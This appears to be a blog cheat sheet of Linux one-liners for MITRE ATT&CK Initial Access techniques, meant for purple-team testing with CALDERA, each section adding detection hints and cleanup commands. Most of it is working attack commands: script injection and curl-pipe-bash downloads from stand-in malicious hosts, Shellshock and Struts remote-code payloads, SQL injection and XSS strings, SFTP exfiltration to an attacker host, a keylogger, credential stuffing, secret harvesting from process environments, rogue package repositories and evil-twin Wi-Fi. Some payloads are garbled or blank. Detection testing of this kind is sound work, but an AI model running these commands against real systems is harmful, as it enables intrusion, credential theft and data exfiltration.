Linux Initial Access Commands Cheat-Sheet – TA0001
Updated on 13 June 2025
Purple teaming lives or dies on coverage. The more distinct ways you can trigger an Initial-Access alert, the faster you uncover gaps in SIEM, EDR, Anti-Virus solutions. Every section below gives you:
- Why it matters – threat context in one sentence.
- One-liners, lots of them – each line is a stand-alone bash command. If one action depends on another, it’s chained with
&&so you still get a single copy-/paste line. - Blue-team watch-outs – artefacts defenders should see.
- Cleanup tip – a single command to reset the host so you can rerun the test.
For deeper MITRE background, read MITRE ATT&CK TA0001, and explore CALDERA’s documentation here. Looking for other cheat sheets ? Linux Privilege Escalation Commands and
T1659 – Content Injection
Why it matters — attackers plant malicious markup or code in otherwise legitimate pages/services.
# Inject rogue <script> into Apache index
sudo sed -i '1i <script src="http://evil.example/payload.js"></script>' /var/www/html/index.html
# Blind SQLi against login form
curl -X POST "[http://target-server/login.php](http://target-server/login.php)" -d "username=admin' OR '1'='1' --\&password=foo"
# Stored XSS via search parameter
curl -G "[http://target-server/search.php](http://target-server/search.php)" --data-urlencode "q=\"
# Command-injection ping test
curl -s "[http://target-server/ping.php?host=127.0.0.1;whoami](http://target-server/ping.php?host=127.0.0.1;whoami)"
# Inline PHP web-shell
printf '\' | sudo tee /var/www/html/info.php Watch for WAF hits, FIM hash changes, www-data spawning shells.
Cleanup git -C /var/www/html checkout -- . && sudo rm /var/www/html/info.php
T1189 – Drive-by Compromise
Why it matters — one browser visit, one payload.
# Host a tiny exploit kit
python3 -m http.server 8080 --directory /tmp/exploit_kit --bind 0.0.0.0
# curl | bash installer
curl -fsSL [http://malicious.example/installer](http://malicious.example/installer) | bash -s -- --silent
# Drop-and-run shell script
curl -s [http://malicious.example/drop.sh](http://malicious.example/drop.sh) -o /tmp/drop.sh && chmod +x /tmp/drop.sh && /tmp/drop.sh
# Grab watering-hole page for offline triage
wget -O /tmp/malicious.html [http://compromised-site.com/index.html](http://compromised-site.com/index.html)
# Force a live browser hit
xdg-open [http://malicious.example](http://malicious.example) || true Watch for new /tmp binaries, outbound DNS/HTTP to fresh domains, SentinelOne exploit heuristics.
Cleanup rm -f /tmp/drop.sh /tmp/malicious.*
T1190 – Exploit Public-Facing Application
Why it matters — one unpatched CVE can hand over a shell.
# Shellshock RCE proof
curl -H 'User-Agent: () { :;}; /bin/bash -c "touch /tmp/shellshock_pwned"' http://127.0.0.1/cgi-bin/status || true
# Apache Struts OGNL RCE (whoami)
curl -X POST "[http://target-server/struts2-showcase/](http://target-server/struts2-showcase/)" -H "Content-Type: application/x-www-form-urlencoded"
-d "name=%{(#dm=@ognl.OgnlContext\@DEFAULT\_MEMBER\_ACCESS).(#cmd='whoami').(#p=new java.lang.ProcessBuilder({'bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#p.start())}"
# XXE to read /etc/passwd
curl -d '\' [http://127.0.0.1/upload?debug=true](http://127.0.0.1/upload?debug=true)
# Path-traversal via netcat
printf 'GET /../../../../etc/shadow HTTP/1.0\r\n\r\n' | nc 127.0.0.1 8080
# sqlmap dump (no interaction)
sqlmap -u "[http://target-server/vuln.php?id=1](http://target-server/vuln.php?id=1)" --batch --dbs Watch for IDS exploit signatures, error spikes, web-server child shells.
Cleanup killall sqlmap; rm /tmp/shellshock_pwned
T1133 – External Remote Services
Why it matters — stolen creds + SSH/VPN/RDP = stealthy foothold.
# Key-based SSH
ssh -o StrictHostKeyChecking=no attacker@10.0.0.2 'hostname && id'
# sshpass password auth
sshpass -p 'P\@ssw0rd!' ssh attacker\@10.0.0.2 'echo \$(date) >> \~/.owned'
# File exfil via SFTP
sftp -oBatchMode=yes attacker\@10.0.0.2:/etc/issue /tmp/issue\_copy
# OpenVPN tunnel
openvpn --config stolen.ovpn --daemon
# openconnect to Cisco AnyConnect
echo 'vpnpass' | openconnect --user attacker vpn.target.com --passwd-on-stdin --background Watch for new tun adapters, geo-impossible logins, outbound 22/1194 flows.
Cleanup pkill openvpn openconnect; rm /tmp/issue_copy
T1200 – Hardware Additions
Why it matters — a rogue USB or NIC bypasses software controls.
# Hot-plug virtual USB
sudo modprobe usbip-core && sudo usbip attach -r 127.0.0.1 -b 1-1
# Dummy NIC in rogue subnet
ip link add rogue0 type dummy && ip addr add 192.168.100.1/24 dev rogue0 && ip link set rogue0 up
# Slow real NIC (perf anomaly)
ethtool -s eth0 speed 10 duplex half
# HID key-logger capture
cat /dev/input/event0 | hexdump -C > /tmp/keylog.txt &
# Spoof USB product string
echo "BadUSB" | sudo tee /sys/bus/usb/devices/1-1/product Watch for new VID/PID, interface speed change, Tanium hardware delta.
Cleanup ip link del rogue0; pkill -f keylog.txt; sudo usbip detach -p 1
T1566 – Phishing & Sub-Techniques
T1566.001 – Spearphishing Attachment
# Build & mail bash attachment
echo -e '#!/bin/bash\necho phished > /tmp/pwn' > /tmp/p.sh && chmod +x /tmp/p.sh && \
mutt -s "Invoice" -a /tmp/p.sh -- user@target <<< "Please review"
T1566.002 – Spearphishing Link
# One-click malicious link email
printf 'Subject: Action Required\n\nClick http://phish.example/login\n' | sendmail user@target
T1566.003 – Spearphishing via Service
# Telegram drop-link
curl -X POST -d "chat_id=<id>&text=Gift+http://bad.example" https://api.telegram.org/bot<token>/sendMessage
T1566.004 – Phishing Voice (Vishing)
# Simulated vishing call log
logger "T1566.004 simulated vishing call asking for VPN creds"
Watch for mail-gateway detonation, proxy hits, abnormal Telegram/DNS, new syslog tag vishing.
Cleanup postsuper -d ALL; rm /tmp/p.sh /tmp/pwn
T1091 – Replication Through Removable Media
Why it matters — autorun USBs still work when EDR is offline.
# Build autorun USB structure
mkdir -p /tmp/usb && \
echo -e '#!/bin/bash\necho autorun > /tmp/usb_exec.log' > /tmp/usb/autorun.sh && chmod +x /tmp/usb/autorun.sh && \
echo -e '[Autorun]\nopen=autorun.sh' > /tmp/usb/autorun.inf && cp /bin/sh /tmp/usb/malware.exe
# Live udev monitor
udevadm monitor --udev --property | grep -E '(ID\_BUS=usb|DEVTYPE=disk)' & Watch for execution from removable paths, new mount-points, SentinelOne removable-media alerts.
Cleanup rm -rf /tmp/usb /tmp/usb_exec.log; pkill udevadm
T1195 – Supply-Chain Compromise & Sub-Techniques
T1195.001 – Compromise Software Dependencies / Dev Tools
# Malicious APT repo + update
echo "deb http://bad.repo/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/bad.list && sudo apt update
# Dependency confusion via rogue PyPI
pip install --index-url [http://bad.pypi/simple/](http://bad.pypi/simple/) requests T1195.002 – Compromise Software Supply Chain
# Unsigned RPM install
rpm -Uvh tampered-1.0-1.x86_64.rpm --nosignature
# Overwrite system .so
wget -O /usr/lib/libssl.so.1.1 [http://malicious.com/libssl.so.bad](http://malicious.com/libssl.so.bad) T1195.003 – Compromise Hardware Supply Chain
# Fake firmware drop
logger "T1195.003 simulated firmware backdoor uploaded"
echo "$(date) fake-firmware-hash" | sudo tee -a /var/log/firmware_audit.log
Watch for unsigned packages, new repo URLs, firmware audit anomalies.
Cleanup sudo rm /etc/apt/sources.list.d/bad.list && sudo apt update && rm /usr/lib/libssl.so.1.1
T1199 – Trusted Relationship
Why it matters — if the MSP is owned, so are you.
# Resolve partner LDAP SRV
dig +short _ldap._tcp.partner.com SRV
# Use MSP SSH key
ssh -i /tmp/msp\_key.pem [service@partner.com](mailto:service@partner.com) 'whoami && hostname'
# Sweep partner space
nmap -sn 10.0.0.0/8 | grep -E '(partner|vendor|supplier)' Watch for cross-tenant auth, new SSH fingerprints, SIEM alert on partner IPs.
Cleanup killall nmap
T1078 – Valid Accounts & Sub-Techniques
T1078.001 – Default Accounts
# Reset root to weak password
echo 'root:P@ssw0rd!' | sudo chpasswd
# Abuse default admin:admin over HTTP
curl -u admin:admin http://target-server.com/admin/
# Credential-stuffing via Hydra
hydra -L /tmp/usernames.txt -P /tmp/passwords.txt ssh://target-server.com
T1078.002 – Domain Accounts
# Kerberos TGT with stolen creds
kinit compromised@REALM && klist
T1078.003 – Local Accounts
# Create local user with sudo
sudo useradd -m attacker && echo 'attacker:P@ss' | sudo chpasswd && sudo usermod -aG sudo attacker
# Snatch secrets from process environment
strings /proc/*/environ | grep -iE 'pass|token|cred' | head
T1078.004 – Cloud Accounts
# AWS key abuse
aws sts get-caller-identity --profile breached
Watch for bursts of failed logins, new /etc/passwd entries, unexpected cloud API calls.
Cleanup sudo passwd -l root; sudo userdel -r attacker; kdestroy
T1078 – Valid Accounts & Sub-Techniques
Exploits insecure or rogue wireless networks to gain entry or harvest credentials.
# Rogue AP
hostapd -B rogue.conf && dhcpd -cf dhcpd.conf wlan0
# Capture WPA handshake
airodump-ng -c 6 --bssid {{target_bssid}} -w cap wlan0
aircrack-ng cap-01.cap -w rockyou.txt
# Evil-twin captive portal
wifiphisher --essid "{{corp_wifi}}" --logging -p oauth-login
# Connect to open guest SSID
nmcli d wifi connect {{open_ssid}}Caldera integration tips 🛠️
- One line = one ability – paste directly into
executor: sh. - Add
cleanup– glue the cleanup string under the ability’scleanupfield. - Randomise & delay – use timers or facts so operations feel human.
- Tag each ability – include the ATT&CK ID/sub-ID so reporting maps cleanly.
Conclusion 🎯
With every TA0001 technique and sub-technique represented (well over 100 self-contained commands), you can now hammer your environment from every Initial-Access angle, measure detections, tune, and rerun until nothing slips through. Learn how to Fine tune an LLM Model to Find Vulnerabilities to keep the edge.
Enjoyed this guide? Share your thoughts below and tell us how you leverage Linux Initial Access Commands in your projects!
Linux Initial Access Commands, TA0001, MITRE ATT&CK, Purple Team, CALDERA, Bash, Security Testing
No comments:
Post a Comment